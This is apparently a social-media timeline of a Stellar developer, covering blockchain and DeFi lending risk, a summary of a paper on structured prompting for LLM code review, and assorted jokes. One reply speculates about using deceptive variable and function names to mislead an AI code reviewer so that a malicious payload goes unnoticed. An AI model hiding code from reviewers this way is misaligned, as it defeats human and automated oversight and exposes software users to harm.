Nicolas Barry

With the way things are evolving in the geo-political and security front in particular, I think we need blockchains and open networks more than ever. Latest in the series are some of my thoughts on what we can do about it. Be sure to read previous posts for context: stellar.org/blog/developer…

@rohanpaul_ai I wonder if the underlying issue can be exploited in adversarial ways: pick deceiving variable/function names to degrade model performance with the purpose of obfuscating some bad payload that will pass “AI code review”

"Can LLM agents explore codebases and reason about code semantics without executing the code?" Meta discovered that if you force an LLM to show its reasoning step by step with proof, its code patch error rate drops by nearly 50%. The finding is not that models suddenly became deeper thinkers. It is that many code errors come from premature recognition: the model sees a familiar name, such as format, and quietly substitutes the usual meaning before checking the project’s actual files. If you just ask a standard LLM to check the code without running it, the model usually just glances at the function names and makes a confident guess. The paper talks about how when asked to compare 2 different code fixes, the standard AI saw a common word and assumed it meant the normal system tool. Because it skipped reading the actual files, the AI completely missed that this specific project had created its own custom tool with the exact same name. Meta solves this by using a mandatory checklist template that prevents the model from skipping ahead. The model must explicitly write down what the code modifies, trace the exact execution path, and prove its conclusion with specific evidence. This simple change forces the AI to actually read the local files and follow the real logic instead of relying on assumptions. This method pushed accuracy to 93% on real code patches without needing any expensive new training or complex systems. Overall, it shows that a basic structured prompt can give you highly reliable code verification without the massive computational cost of actually running the software tests. ---- Paper Link – arxiv. org/abs/2603.01896 Paper Title: "Agentic Code Reasoning"

Weekend project to go from vibe-brewing to fully agentic workflow royalsocietypublishing.org/rsos/article/1…

📹 VIDÉO - #Insolite : Pendant la coupe des griffes, une marmotte semble avoir déjà accepté son destin… tandis que l’autre panique à chaque coup de coupe. Une scène aussi drôle que totalement théâtrale.

Someone built a Google translate for Linkedin 😭

.@StellarOrg Q4 2025: Everything you need to know on RWAs. In 2025, the market cap of RWAs on Stellar increased 196% from $301.1 million to $890.2 million, driven primarily by the issuance of new assets such as treasuries from @Spiko_finance and real estate from @RedSwanDigital, alongside the growth of @FTDA_US's U.S. Government Money Fund (BENJI) and @etherfuse’s government debt offerings.

Having a limit as “best practice” takes on a different meaning

I've just seen the worst enum in my life

Want some bread with your slop bisque? Exciting times to see how we’re going to speed run engineering practices - the ride may be bumpy so not for the faint of heart

how many escape functions do we need now? it used to be urlencode was it

Got to be compliant

achieving AGI by reducing the intelligence of the average human rather than increasing the intelligence of AI

And if you don’t feel this way… you’re probably underestimating by “a lot” what is going on. You need to relearn & reevaluate what this tech can do on a regular basis: you thinking that you have a workflow is the trap

Perfect 10

Good test to know if you're worthy. Well... there is always that secret key thing though

Some misconceptions and paradoxes in DeFi lending: Lending is based on trust. This is the self-evident truth on which banking is built. Losing trust means losing capital, and that can cause bank runs or systemic collapses. The way to preserve trust is to create a system that is fundamentally risk-averse throughout the entire supply chain. Ignore this rule and you are effectively in the business of risk-taking, which is more akin to today’s hedge funds. DeFi lending protocols follow the same basic principles as banking. The fundamental difference between traditional finance and DeFi lending systems is that lending protocols encode trust mechanisms into the code for reasons like improving automation, capital efficiency, and liquidity provisioning etc. Some people have a flawed idea that if a lending protocol fixes parameters around trust, it will somehow improve trust. Of course, this does not make sense since you are simply moving trust from one place to another. From one market level to another, but not really improving the trust assumptions, at all in fact. You also cannot rely on fully immutable systems in dynamic marketplaces such as lending and borrowing. This is why comparing lending protocols to AMMs does not work either. Traders on AMMs do not depend on ongoing trust; their transactions are one-off trades, while borrowers and lenders maintain a relationship until the debt is repaid. Applying immutable parameters means the system cannot adapt to changing market conditions, and financial markets are nothing if not dynamic. It’s relatively straightforward to run immutable model during up cycle, however bear markets is where the true resiliency is tested out. Now, back to the idea of moving trust from one place to another. Since trust always exists in lending, and most markets will likely rely on some level of human involvement, the real question is: at what level and under what circumstances should that involvement occur? In isolated lending protocols like Aave, decision-making happens at the lowest level, close to the markets. This has benefits, such as ensuring that parameter decisions remain aligned with the protocol’s risk framework in a non-conflicted way. Risk managers are paid fixed fees to protect the protocol. If they fail, they get replaced, as we have seen before. In designs where human involvement is moved higher up and risk curators are incentivized based on fund performance, hidden issues can emerge that are highly detrimental to the system. First, the idea of risk curation as isolation is misleading. While markets may be separated, risk curators often share liquidity across markets by supplying to the same markets and comingling strategies. This means users can be exposed to the weakest curator or market in the system, with no capped protection. For example: Curator A supplies liquidity to markets B and C, while curator D supplies liquidity to markets C and E. If market E loses trust, for instance through a depeg event like xUSD or deUSD, it could trigger a bank run from market E, driving utilization to 100% and creating a race for withdrawals and even full insolvency. At the same time, LPs withdrawing from the curated vaults cause another bank run at the vault level, meaning markets B and C are affected too. As a result, curator A’s LPs, even those subscribed to less risky strategies, would also be impacted, intensifying the liquidity contagion, even if they didn’t supply the liquidity into the problematic market, creating protocl-wide bank run. This is my biggest concern with this type of design model: it leads to contagious liquidity effects that break trust while marketing some sort of risk isolation, which doesn’t in reality exist. It is especially problematic for RWAs, which require greater isolation due to their specific characteristics. The problem worsens when considering curator incentives. DeFi risk strategies are highly commoditized. Lending against ETH or BTC is not particularly profitable or exciting for degens. So curators often go on the offensive, adding new types of collateral, sometimes untested or poorly understood. Other curators then rush to copy and allocate capital to these new markets. It becomes a speed race to capture reward at the cost of additional risk, much like hedge funds today operate. It’s especially problematic for integrators that are looking to run their own strategies, knowing they would be commingled with strategies ran by riskier vault curators, making integrations more challenging. Also this design comes at the cost of liquidity segregation, without truly improving or isolating risk, while introducing potential systemic contagion on every bank run. Given the permissionless nature, we will see more events of contagions spread. It’s important for everyone to understand the mechanisms. DeFi is still relatively young, less than a decade old, and any large-scale issue could set the industry back significantly. We are close to building safe and secure DeFi, and we need to protect the users. Hope this is a good learning on how to build better DeFi. Just use Aave.

you can't self-custody a stablecoin btw the central issuer of the stable can lock you out even while you hold it in your wallet this is, obviously, not possible with cash not to FUD stablecoins, which obviously have their use but this must be acknowledged

TEEs are good for a certain class of attacks, but it’s true that people tend to skip the “not resistant to physical access” part

Releases for Stellar Protocol 24 are now available. If you run Stellar infrastructure, make sure to install them ASAP! Oct 20: Stable releases available. Oct 21 at 2100 UTC: Testnet upgrade. Oct 22 at 1700 UTC: Mainnet upgrade vote. Check out the upgrade guide for more info on this stability upgrade that fixes a bug in the state archival feature in Stellar Core. stellar.org/blog/developer…